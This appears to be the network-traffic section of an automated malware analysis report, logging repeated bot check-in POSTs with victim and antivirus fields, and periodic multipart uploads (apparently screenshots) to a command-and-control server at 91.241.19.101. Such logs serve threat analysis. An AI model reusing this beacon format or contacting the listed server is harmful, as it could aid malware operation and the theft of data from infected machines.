          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----27c9b75bf3a30d742ab67f61da2c5706Host: 91.241.19.101Content-Length: 86605Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
